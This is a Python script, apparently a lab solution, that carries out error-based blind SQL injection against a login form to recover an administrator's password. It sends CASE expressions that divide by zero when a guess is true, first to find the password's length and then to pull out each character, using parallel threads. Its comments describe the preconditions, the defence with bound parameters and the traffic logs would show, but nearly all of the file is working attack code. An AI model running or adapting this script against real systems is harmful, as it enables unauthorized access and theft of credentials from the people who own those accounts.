Error Base

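# Error-based blind SQL injection against a login form. Each request puts a
# CASE expression in the username field that evaluates 1/0 only when a guess
# about the administrator's stored password is true; the script reads the
# answer from whether the normal page marker is missing from the response.
# This works only if the username is concatenated into the SQL text and a
# database error changes the page; bound parameters and a uniform failure
# response remove both conditions.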
import requests
from concurrent.futures import ThreadPoolExecutor, as_completed

# SETUP
# Endpoint that receives the login form POST.
url = "http://target-site.com/login"  # Replace with actual target

# Text that appears when no error occurs; its absence is the only signal
# the rest of the script looks at.
needle = "Welcome"

# Declares the request body as form-encoded.
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
}

# Worker count handed to every ThreadPoolExecutor created further down.
max_threads = 10

# Error Detection
def is_error_triggered(payload):
    """Send one login POST with *payload* as the username and test the reply.

    Returns True when ``needle`` is absent from the response body, which the
    script interprets as "the injected expression raised a database error".
    Returns False when the marker is present, and also when the request
    itself fails with ``requests.RequestException``.

    The check is a plain substring test, so every response without the
    marker counts as an error here, whatever produced it.
    """
    form = {"username": payload, "password": "irrelevant"}
    try:
        reply = requests.post(url, data=form, headers=headers, timeout=5)
        marker_missing = needle not in reply.text
    except requests.RequestException:
        # A transport failure is reported as "no error", not as a match.
        return False
    return marker_missing

# Find password length
def test_length(length):
    """Probe whether the administrator's password has exactly *length* characters.

    The payload concatenates a subquery into the username value; its CASE
    evaluates ``1/0`` only when ``LENGTH(password)`` equals the candidate, so
    a true guess is expected to surface as a database error.

    Returns *length* when ``is_error_triggered`` reports an error for the
    payload, otherwise ``None``.
    """
    payload = f"'||(SELECT CASE WHEN LENGTH(password)={length} THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'"
    return length if is_error_triggered(payload) else None

def find_password_length():
    """Try candidate lengths 1 through 50 concurrently and return the first hit.

    All fifty probes are submitted up front; the first completed probe that
    reports a match is printed and returned. Returns ``None`` when no
    candidate matches.

    Seen from the server, this is a burst of up to fifty login POSTs whose
    username field carries SQL syntax.
    """
    print("[*] Searching for password length...")
    with ThreadPoolExecutor(max_threads) as pool:
        pending = []
        for candidate in range(1, 51):
            pending.append(pool.submit(test_length, candidate))
        for finished in as_completed(pending):
            hit = finished.result()
            if not hit:
                continue
            print(f"[+] Password length found: {hit}")
            # Returning from inside the `with` still waits for the
            # probes that are already queued or running.
            return hit
    print("[-] Failed to find password length")
    return None

# Extract password
def test_char(position, char):
    """Probe whether the password character at *position* equals *char*.

    *position* is passed straight to ``SUBSTR`` (callers in this file start
    at 1). *char* is placed inside a quoted SQL literal without escaping.

    Returns *char* when ``is_error_triggered`` reports an error for the
    payload, otherwise ``None``.
    """
    payload = f"'||(SELECT CASE WHEN SUBSTR(password,{position},1)='{char}' THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'"
    return char if is_error_triggered(payload) else None

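def extract_password(length):
    """Recover the password one position at a time and return it as a string.

    For each position from 1 to *length*, one probe per charset entry is
    submitted to a fresh thread pool and the first probe that reports a
    match supplies that position's character. A position where no candidate
    matches adds nothing, so the returned string can be shorter than
    *length*.

    Seen from the server, this is one login POST per charset entry per
    position, each carrying SQL syntax in the username field. That volume
    and shape is what login logs and request-rate alerts would show.

    The final status line prints a check mark; the original literal held the
    mis-decoded bytes of that character.
    """
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_=+"
    password = ""
    print("[*] Extracting password...")
    for i in range(1, length + 1):
        with ThreadPoolExecutor(max_threads) as executor:
            futures = [executor.submit(test_char, i, c) for c in charset]
            for future in as_completed(futures):
                result = future.result()
                if result:
                    password += result
                    print(f"[+] Found character {i}: {result}")
                    # Leaving the `with` block still waits for the remaining
                    # probes of this position before moving on.
                    break
    print(f"[✓] Extracted password: {password}")
    return password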

# MAIN
# Driver: runs at import time as well as on direct execution, since there is
# no `if __name__ == "__main__"` guard around it.
length = find_password_length()
# find_password_length() returns None when no candidate length matched, in
# which case extraction is skipped.
if length:
    extract_password(length)
